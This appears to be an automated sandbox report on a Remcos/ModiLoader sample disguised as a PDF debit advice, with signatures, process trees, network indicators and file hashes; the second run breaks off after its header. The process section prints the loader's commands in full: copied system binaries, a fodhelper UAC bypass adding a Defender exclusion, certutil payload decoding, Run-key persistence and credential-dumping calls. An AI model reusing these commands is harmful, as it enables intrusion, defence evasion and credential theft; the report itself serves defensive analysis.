Malware Analysis Report

2025-01-02 03:19

Sample ID 240326-pvl7xadc6z
Target DEBIT_ADVICE_000610PAY001522024.PDF.tar.gz
SHA256 d1a3e9d965809db746d3dbe909753f38e2073737347cc8d5714c78969b352d06
Tags
modiloader remcos remotehost collection persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d1a3e9d965809db746d3dbe909753f38e2073737347cc8d5714c78969b352d06

Threat Level: Known bad

The file DEBIT_ADVICE_000610PAY001522024.PDF.tar.gz was found to be: Known bad.

Malicious Activity Summary

modiloader remcos remotehost collection persistence rat trojan

ModiLoader, DBatLoader

Remcos

Nirsoft

NirSoft MailPassView

ModiLoader Second Stage

NirSoft WebBrowserPassView

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Adds Run key to start application

Accesses Microsoft Outlook accounts

Suspicious use of SetThreadContext

Program crash

Enumerates physical storage devices

Modifies registry class

Suspicious use of WriteProcessMemory

Script User-Agent

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Modifies registry key

Kills process with taskkill

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: CmdExeWriteProcessMemorySpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-26 12:39

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-26 12:39

Reported

2024-03-26 12:41

Platform

win7-20240221-en

Max time kernel

122s

Max time network

152s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Remcos

rat remcos

ModiLoader Second Stage

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

NirSoft MailPassView

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

NirSoft WebBrowserPassView

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Nirsoft

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\cmd.exe | N/A
N/A | N/A | C:\Windows\system32\cmd.exe | N/A
N/A | N/A | C:\Windows\system32\cmd.exe | N/A
N/A | N/A | C:\Users\Public\alpha.exe | N/A
N/A | N/A | C:\Users\Public\xkn.exe | N/A
N/A | N/A | C:\Users\Public\xkn.exe | N/A
N/A | N/A | C:\Users\Public\alpha.exe | N/A

Accesses Microsoft Outlook accounts

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\colorcpl.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\Koomxsve = "C:\\Users\\Public\\Koomxsve.url" | C:\Users\Public\Libraries\Lewxa.com | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 2108 set thread context of 2124 | N/A | C:\Windows\SysWOW64\colorcpl.exe | C:\Windows\SysWOW64\colorcpl.exe
PID 2108 set thread context of 2484 | N/A | C:\Windows\SysWOW64\colorcpl.exe | C:\Windows\SysWOW64\colorcpl.exe
PID 2108 set thread context of 2884 | N/A | C:\Windows\SysWOW64\colorcpl.exe | C:\Windows\SysWOW64\colorcpl.exe

Enumerates physical storage devices

Program crash

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\colorcpl.exe

Kills process with taskkill

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings\shell | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings\shell\open | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users " | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings\shell\open\command | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings | C:\Windows\system32\reg.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\reg.exe | N/A

Script User-Agent

Description | Indicator | Process | Target
HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Public\Libraries\Lewxa.com | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Public\xkn.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Public\xkn.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2456 wrote to memory of 2888 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 2456 wrote to memory of 2888 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 2456 wrote to memory of 2888 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 2888 wrote to memory of 2468 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\extrac32.exe
PID 2888 wrote to memory of 2468 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\extrac32.exe
PID 2888 wrote to memory of 2468 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\extrac32.exe
PID 2456 wrote to memory of 2116 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2116 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2116 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2116 wrote to memory of 2504 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 2116 wrote to memory of 2504 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 2116 wrote to memory of 2504 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 2456 wrote to memory of 2592 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2592 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2592 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2592 wrote to memory of 2632 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 2592 wrote to memory of 2632 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 2592 wrote to memory of 2632 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 2456 wrote to memory of 2688 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2688 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2688 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2688 wrote to memory of 1148 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\xkn.exe
PID 2688 wrote to memory of 1148 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\xkn.exe
PID 2688 wrote to memory of 1148 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\xkn.exe
PID 1148 wrote to memory of 2600 | N/A | C:\Users\Public\xkn.exe | C:\Users\Public\alpha.exe
PID 1148 wrote to memory of 2600 | N/A | C:\Users\Public\xkn.exe | C:\Users\Public\alpha.exe
PID 1148 wrote to memory of 2600 | N/A | C:\Users\Public\xkn.exe | C:\Users\Public\alpha.exe
PID 2600 wrote to memory of 2372 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\reg.exe
PID 2600 wrote to memory of 2372 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\reg.exe
PID 2600 wrote to memory of 2372 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\reg.exe
PID 2456 wrote to memory of 2392 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2392 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2392 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2392 wrote to memory of 2440 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 2392 wrote to memory of 2440 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 2392 wrote to memory of 2440 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 2456 wrote to memory of 2820 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2820 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2820 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2820 wrote to memory of 2416 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 2820 wrote to memory of 2416 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 2820 wrote to memory of 2416 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 2456 wrote to memory of 1572 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\Lewxa.com
PID 2456 wrote to memory of 1572 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\Lewxa.com
PID 2456 wrote to memory of 1572 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\Lewxa.com
PID 2456 wrote to memory of 1572 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\Lewxa.com
PID 2456 wrote to memory of 880 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 880 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 880 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 1324 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 1324 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 1324 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 1672 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 1672 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 1672 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 1072 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 1072 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 1072 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2356 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2356 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2356 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2356 wrote to memory of 2172 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\taskkill.exe
PID 2356 wrote to memory of 2172 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\taskkill.exe
PID 2356 wrote to memory of 2172 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\taskkill.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat"

C:\Windows\system32\cmd.exe

cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "

C:\Users\Public\xkn.exe

C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "

C:\Users\Public\alpha.exe

"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "

C:\Windows\system32\reg.exe

reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat" "C:\\Users\\Public\\Lewxa.txt" 9

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat" "C:\\Users\\Public\\Lewxa.txt" 9

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12

C:\Users\Public\Libraries\Lewxa.com

C:\\Users\\Public\\Libraries\\Lewxa.com

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM SystemSettings.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM SystemSettingsAdminFlows.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c mkdir "\\?\C:\Windows "

C:\Windows\SysWOW64\cmd.exe

cmd /c mkdir "\\?\C:\Windows \System32"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Windows \System32\429728.exe"

C:\Windows \System32\429728.exe

"C:\Windows \System32\429728.exe"

C:\Windows \System32\429728.exe

"C:\Windows \System32\429728.exe"

C:\Windows\SysWOW64\extrac32.exe

C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Lewxa.com C:\\Users\\Public\\Libraries\\Koomxsve.PIF

C:\Windows\SysWOW64\colorcpl.exe

C:\Windows\System32\colorcpl.exe

C:\Windows\SysWOW64\colorcpl.exe

C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\rtnl"

C:\Windows\SysWOW64\colorcpl.exe

C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\bnaeuezy"

C:\Windows\SysWOW64\colorcpl.exe

C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\dpgxuwkrtcw"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2108 -s 788

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 1010.filemail.com | udp
US | 23.237.50.106:443 | 1010.filemail.com | tcp
US | 23.237.50.106:443 | 1010.filemail.com | tcp
N/A | 127.0.0.1:45671 | | tcp
N/A | 127.0.0.1:55677 | | tcp
US | 192.3.101.8:55677 | | tcp
US | 192.3.101.8:55677 | | tcp
US | 8.8.8.8:53 | geoplugin.net | udp
NL | 178.237.33.50:80 | geoplugin.net | tcp

Files

\Users\Public\alpha.exe

MD5 5746bd7e255dd6a8afa06f7c42c1ba41
SHA1 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256 db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA512 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

C:\Users\Public\xkn.exe

MD5 852d67a27e454bd389fa7f02a8cbe23f
SHA1 5330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256 a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

memory/1148-21-0x000007FEF6070000-0x000007FEF6A0D000-memory.dmp

memory/1148-22-0x0000000002360000-0x00000000023E0000-memory.dmp

memory/1148-23-0x0000000002360000-0x00000000023E0000-memory.dmp

memory/1148-24-0x000000001B120000-0x000000001B402000-memory.dmp

memory/1148-25-0x0000000001D00000-0x0000000001D08000-memory.dmp

memory/1148-26-0x0000000002360000-0x00000000023E0000-memory.dmp

memory/1148-31-0x000007FEF6070000-0x000007FEF6A0D000-memory.dmp

\Users\Public\kn.exe

MD5 ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1 ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA256 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA512 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

C:\Users\Public\kn.exe

MD5 6280628648abad0f367455549ee5e1c9
SHA1 423439425240825f8a1ae5b8650c873efa2b5086
SHA256 17907a23ff31b70fed7141addfb4b0b4ef06d3cd7cd00c4843c3eb99c20825fe
SHA512 df5d797996aaa0a3b41040ea84d6f26a86def06695e41eb94497683f93a6f34ee7e5d09b291f0e1cc357d4e9a98074b5740ab4f54a8aa18f5df33c8461d7eeb4

C:\Users\Public\kn.exe

MD5 9cd591e16329e8d6c2e4e173741be3d6
SHA1 50cf868810378901a16e2dd331d8ba49258716d3
SHA256 0a52fb96df41b3a56c4237b1ef4a4c254718213dde27a217960e0e65f19ecd32
SHA512 510e515b135575d773d6d4bced738f5b753de5b8812892000a4fe5391fe3abee8296f0cbb2cbb8a87f402a218cb9ac2b2c77d8a3a5f865dcbd5e9dbd2d211263

C:\Users\Public\kn.exe

MD5 edcac3744681d43e823f75cb83e60f1b
SHA1 600c72126e3e117f3ccc3fac152306e1e01b4262
SHA256 c804301e81225c9b22cc7ff359ee94a2c7e73cfced18df46a66f7f294248a340
SHA512 b2d3da4e4ab2b9f4e658817f6d5bbc34958b38999734c7e913e78db38d1f7f9f9c06a577319f23d1594dd22cf1eaf96226148c97148601e8cdcdeea91cac5753

C:\Users\Public\Lewxa.txt

MD5 2814120cc6f42ef208d9a13cb4ccc407
SHA1 2936e475cd97d4ba20029e4ccae4c49c6520fe51
SHA256 040a8f37736751babab04f2a7aaa4ba8920d95600167b05c0113ae1b1373ef92
SHA512 5b4e33d7516f26e3d1cdcdd5549fdc81852332e536cc7138468447aebf644b4a3a836c0decddcbf24fd7a70339fd3773cae68c16e677d90840ec9ecd5232274a

C:\Users\Public\Libraries\Lewxa.com

MD5 d4deb0e1e87b260afd60da800db2fc6d
SHA1 b8b2f6ca158cd7d0408a2aece92cde99b2dd24fb
SHA256 a62bff139e06d77a271591eb1c404776d7c39ece217d6695c5984693dbf14417
SHA512 8822168d4968ba66a1fbd1b6f9fed2b36b20f7bab8cffac8060645d49bca05e45583f2d2c870eb9f9b626e86afb6812384d4d65e94d16987e6db020db6aa51bb

memory/1572-45-0x0000000000230000-0x0000000000231000-memory.dmp

C:\Users\Public\alpha.exe

MD5 623ccab59dc69e79fa74cd7c2a63c8e0
SHA1 811b45c0c2bc67113684ac478719907da5a9932d
SHA256 19270f901d0b56e8fe4bf4006df1e58686ef191bf7480f2a0027354a2d191529
SHA512 fa3d8284c10c813b906ff5b202194b60910e4ef34201badb9e0fb2a86e6a60c09c3e79bda37b069363219fd165652b642d266c193386cd69d506cce287f9e36d

C:\Users\Public\Libraries\Lewxa.com

MD5 28abbd0440f992d9acdff6b232196491
SHA1 b0a2d2f3c2fdc6b20c218d20f593f54078b7574e
SHA256 0b03314ff8b7fc4993c1340e0f7802d2bc4eafedb2629c77d2d68511989bc546
SHA512 a885bc85ea84c958370383e2f653c4e7cb96395c1714b7e3ccc4faba5ded535ac3f9601c21bfbd609747dce1b851536a1ca120cc0b4c32e131d20ec664040ea0

C:\Users\Public\alpha.exe

MD5 97fbe5145ed5be80d5a272cbd5fc9f77
SHA1 1d871170692c4c0b150a47b2edf1def7d519689d
SHA256 10148bf21c3361ac464200a094b2a311571b24f4853abd47df1f358a2a9a3ef5
SHA512 5e1a163a2b9ed18036b4991bdda2ceca07b7b31ff5c94c10ac3cf0d58ccbcf7030aaa3f32763d409acbcd118318187d68555d710ecd5cd5d1a9b097fe2b3f55e

C:\Users\Public\xkn.exe

MD5 8b0835adecde8632b9369aad5b487b92
SHA1 9bd59b4ff9b0856cfcee1f01df17f65c63a97a84
SHA256 7a0b9fd4c1ec32b21f5ae4603bca4b773e4cb81371c8542204bc95782fc69bcf
SHA512 3c43c7d78d97df0d096db35b4533a4a17a69eaf003bbcb0087c7a4c06c729ba122385f53c50c162c22feee67f6f91aa3b8a39f2f732a8ef4311b60a8b9f9fbb4

memory/1572-52-0x0000000002DC0000-0x0000000003DC0000-memory.dmp

memory/1572-53-0x0000000002DC0000-0x0000000003DC0000-memory.dmp

memory/1572-56-0x0000000000230000-0x0000000000231000-memory.dmp

memory/1572-57-0x0000000000400000-0x0000000000527000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\TarD3E9.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

C:\Windows \System32\429728.exe

MD5 231ce1e1d7d98b44371ffff407d68b59
SHA1 25510d0f6353dbf0c9f72fc880de7585e34b28ff
SHA256 30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96
SHA512 520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

memory/1268-123-0x0000000002480000-0x0000000002481000-memory.dmp

memory/2108-137-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2108-139-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2108-140-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2108-141-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2108-145-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2108-147-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2108-150-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2108-152-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2108-151-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2108-153-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2124-156-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2124-161-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2484-160-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2884-163-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2124-165-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2884-168-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2484-166-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2484-170-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2124-164-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2124-154-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2884-172-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2884-175-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2884-174-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2884-176-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2108-178-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2124-183-0x0000000000400000-0x0000000000478000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\rtnl

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/2108-185-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2108-186-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2484-189-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2108-188-0x0000000000360000-0x0000000000379000-memory.dmp

memory/2108-192-0x0000000000360000-0x0000000000379000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-26 12:39

Reported

2024-03-26 12:41

Platform

win10v2004-20240226-en

Max time kernel

149s

Max time network

151s

Command Line

